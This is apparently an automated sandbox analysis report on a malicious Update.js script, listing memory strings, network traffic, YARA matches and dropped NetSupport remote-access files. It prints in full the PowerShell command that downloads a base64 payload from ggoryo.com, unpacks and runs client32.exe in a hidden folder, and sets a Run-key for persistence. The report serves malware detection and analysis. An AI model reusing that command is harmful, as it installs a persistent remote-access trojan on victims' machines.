                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drString found in binary or memory: http://sv.symcd.com0&
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.drString found in binary or memory: http://www.netsupportsoftware.com
                                Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggorxo.com/
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0139F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com
                                Source: wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/
                                Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/0X
                                Source: wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/s
                                Source: wscript.exe, 00000000.00000003.1487288378.000001FC55788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/trade/da
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/trade/da.php?9800
                                Source: wscript.exe, 00000000.00000003.1369359764.000001FC5575A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1389692516.000001FC555C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244089717.000001FC54A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/trade/fix.php?6867
                                Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/trade/fix.php?6867EF
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: wscript.exe, 00000000.00000003.1366341815.000001FC53AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1243375949.000001FC518D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                Source: powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                                Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
                                Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355050587.000001FC57D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
                                Source: wscript.exe, 00000000.00000003.1253318916.000001FC539D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.htmlX
                                Source: wscript.exe, 00000000.00000003.1416060813.000001FC5443D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.htmlXVNT
                                Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsString found in binary or memory: https://www.googleapis.com
                                Source: wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.comp
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                Source: unknownHTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49707 version: TLS 1.2
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,10_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110335A0 GetClipboardFormatNameA,SetClipboardData,10_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,10_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,10_2_11033320
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,10_2_110077A0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,10_2_11114590
                                Source: Yara matchFile source: 10.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4108, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,10_2_111165C0

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: amsi64_7024.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: sslproxydump.pcap, type: PCAPMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: wscript.exe PID: 7024, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Powershell drops PE file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dllJump to dropped file
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                                Wscript starts Powershell (via cmd or directly)
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeProcess Stats: CPU usage > 24%
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11113190: GetKeyState,DeviceIoControl,keybd_event,10_2_11113190
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,10_2_1115EA00
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102DD21
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBFA14EE8_2_00007FFECBFA14EE
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBFA25008_2_00007FFECBFA2500
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBFA22128_2_00007FFECBFA2212
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBFAAAD38_2_00007FFECBFAAAD3
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBFA172F8_2_00007FFECBFA172F
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECC4B704A8_2_00007FFECC4B704A
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1107368010_2_11073680
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11029BB010_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110627B010_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110336D010_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1105180010_2_11051800
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1115F84010_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1102BD4010_2_1102BD40
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1101BCD010_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11087F5010_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11045E7010_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1101C11010_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_111640E010_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1116834510_2_11168345
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_111265B010_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1107043010_2_11070430
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1108074010_2_11080740
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1100892B10_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1101CF3010_2_1101CF30
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1116EE8B10_2_1116EE8B
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_6CA8A98010_2_6CA8A980
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: String function: 11161299 appears 41 times
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: String function: 11027F40 appears 47 times
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: String function: 11164ED0 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: String function: 11147060 appears 594 times
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: String function: 1105E820 appears 293 times
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: String function: 6CA97D00 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: String function: 11081E70 appears 46 times
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: String function: 11029A70 appears 1003 times
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: String function: 1116FED0 appears 37 times
                                Source: Update.jsInitial sample: Strings found which are bigger than 50
